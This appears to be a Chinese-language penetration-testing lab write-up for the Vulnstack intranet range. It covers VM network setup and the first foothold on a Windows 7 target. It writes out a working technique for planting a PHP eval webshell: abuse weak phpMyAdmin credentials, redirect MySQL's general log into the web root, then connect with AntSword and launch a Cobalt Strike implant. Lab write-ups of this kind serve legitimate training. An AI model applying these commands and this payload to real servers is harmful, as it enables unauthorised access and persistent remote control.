靶场信息

地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

发布日期：2019年10月20日 14:05

目标：上线三个管理员权限靶机

标签:  内网渗透 | Kill Chain | 域渗透 | 威胁情报

百度网盘：https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset

密码: 下载密码：n1u2

环境配置

image-20210816150309869

1）设置网卡信息

文章中的网卡设置如下

这里共使用了2张网卡，VMnet1和VMnet2，其中VMnet1连接有kali和第一个靶场，说明此网卡用来模拟公网ip，我本地使用NAT的VMnet8来代替，VMnet2内网网卡使用本地的VMnet6代替

绘图3

查看第三个靶场的网卡配置

image-20210816224207514

查看第三个靶场的网卡配置，需要把我本地的VMnet6设置为

ip地址：192.168.52.1
子网掩码：255.255.255.0
默认网关：192.168.52.2

VMware虚拟网络配置

子网ip：192.168.52.0
子网掩码：255.255.255.0
DHCP
ip范围：192.168.52.3-254

image-20210816224611723

三个靶机网卡配置

第一个靶场windows7
双网卡：VMnet8（NAT）+VMnet6
这里需要注意，VMnet6的网卡所在的网络适配器IP是自定义的，NAT是自动获取，不能弄反
第二个靶场win2k3
网卡VMnet6
第三个靶场windows2008
网卡VMnet6
攻击机kali
网卡VMnet8（NAT）

2）win7靶机开启phpstudy

image-20210817155537114

3）windows2008开启redis服务

image-20210818231550535

一、信息收集

1）确定目标

使用netdiscover扫描10.0.1.0网段存活主机

netdiscover -r 10.0.1.0/24 -i eth0

得到ip地址：10.0.1.5

**

2）端口扫描

nmap -v -T4 -p- -A -oN nmap.log 10.0.1.5

phpstudy开的80和3306

image-20210816230424517

3）访问靶机

http://10.0.1.5

探针里面已经泄露了网站的绝对路径

image-20210816230623436

尝试一下，可以访问phpmyadmin，且mysql是弱口令root/root毫无套路

4）上线蚁剑

http://10.0.1.5/phpmyadmin

通过phpstudy开启的服务，使用弱口令连接phpmyadmin

image-20210816231520381

写入webshell

show global variables like '%secure_file_priv%';
NULL    不允许导入或导出
/tmp    只允许在 /tmp 目录导入导出
空      不限制目录

这里是NULL，放弃这个into outfile，尝试写日志或者利用yxcms，既然在mysql窝里那就搞mysql吧

image-20210816231919421

日志文件写 shell

SHOW VARIABLES LIKE 'general%';

image-20210816232940366

general_log 默认关闭，开启它可以记录用户输入的每条命令，会把其保存在对应的日志文件中。可以尝试自定义日志文件，并向日志文件里面写入内容的话，那么就可以成功 getshell：

# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/ch4nge.php';
# 查看当前配置
SHOW VARIABLES LIKE 'general%';

成功

image-20210816233127924

# 往日志里面写入 payload
select '<?php @eval($_POST[miss]);?>';
# 此时已经写到 ch4nge.php 文件当中了

image-20210816233243292

蚁剑连接

连上了

image-20210816233333885

探测一下发现管理员权限还出网

image-20210816233649426

5）补充：yxcms上线蚁剑方法

想搞yxcms可以参考我前面的文章https://www.freebuf.com/articles/web/277572.html

管理员登录需要修改r=admin

yxcms的默认用户名密码是admin/123456

在页面配置中可以修改页面源码，直接加入一句话就ok了。

6）上线CS

kali的ip是10.0.1.12，启动CS服务，建立监听生成远控马，蚁剑传进去执行上线

image-20210816234136020